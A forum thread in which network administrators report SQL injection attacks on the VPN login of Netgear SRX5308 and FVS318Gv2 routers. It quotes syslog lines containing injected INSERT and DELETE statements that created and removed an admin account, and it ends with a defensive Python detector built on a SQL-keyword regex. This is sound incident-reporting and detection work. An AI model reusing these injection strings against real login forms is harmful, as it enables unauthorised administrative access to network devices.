Successful hack of our SRX5308
Hi,
Our SRX5308 was successfully hacked on Sep 27th. They seem to have found a SQL password that keeps users in an internal database and injected a new user 'app'. We had SYSLOG to another machine, so we caught the successful attempt and steps:
I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password.
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Re: Successful hack of our SRX5308
It seems like a very old school DB injection during login. Seems that Netgear does not db_escape their user input. Gawd!
Re: Successful hack of our SRX5308
These have been out of support for a little while now. Sadly, Netgear hasn't seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.
Re: Successful hack of our SRX5308
This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500: end of support and firmware upgrades. Sadly, the BR500 is not reliable.
Re: Successful hack of our SRX5308
Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken.
[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5
[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
[FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app
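Added detection example, not code from the thread or from Netgear: a small Python checker that runs over constructed log lines in the two formats quoted above (the SRX5308 lines in the first post and the FVS318Gv2 lines in the last reply) and flags SQL keywords inside the username of an "Invalid Password" event, administrator accounts being added, and Admin logins for accounts that are not on an allow-list. The allow-list contents and the RFC 5737 host addresses are assumptions.

```python
import re

# Constructed sample lines mimicking the two syslog formats seen in the thread
# (SRX5308 and FVS318Gv2); hosts are RFC 5737 documentation addresses, not real ones.
SAMPLE_LOG = """\
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,Password) VALUES('app','x');
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 192.0.2.10
Sep 27 16:19:40 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user admin(Admin) from host 198.51.100.7
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:00 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user bob
[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5
[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 203.0.113.5
"""

# Matchers for the three event types present in the thread's logs.
BAD_PASSWORD = re.compile(r"Invalid Password for user (?P<user>.*)$")
ADMIN_LOGIN = re.compile(r"Login Successful for \w+ user (?P<user>[^(]+)\(Admin\) from host (?P<host>\S+)")
ADMIN_ADDED = re.compile(r"Administrator (?P<user>\S+) is successfully added")
# A username should never contain a quote followed by a SQL statement keyword;
# that combination is the injection signature visible in the quoted logs.
SQLI_IN_USER = re.compile(r"['\"].*\b(insert|delete|update|drop|union|select)\b", re.I)


def analyze(log_text, known_admins):
    """Return a list of (kind, detail, host) alerts for: SQL keywords in a failed
    login's username, administrator accounts being added that are not known,
    and Admin logins by accounts that are not known."""
    alerts = []
    for line in log_text.splitlines():
        m = BAD_PASSWORD.search(line)
        if m:
            s = SQLI_IN_USER.search(m.group("user"))
            if s:
                alerts.append(("sqli_attempt", s.group(1).upper(), None))
            continue  # a failed login line carries no other event
        m = ADMIN_ADDED.search(line)
        if m and m.group("user") not in known_admins:
            alerts.append(("unexpected_admin_added", m.group("user"), None))
            continue
        m = ADMIN_LOGIN.search(line)
        if m and m.group("user").strip() not in known_admins:
            alerts.append(("unexpected_admin_login", m.group("user").strip(), m.group("host")))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG, {"admin"}):
        print(alert)
```

Pointing this at the syslog collector that the first poster already had in place would have raised the first alert on the INSERT line, three seconds before the injected account logged in.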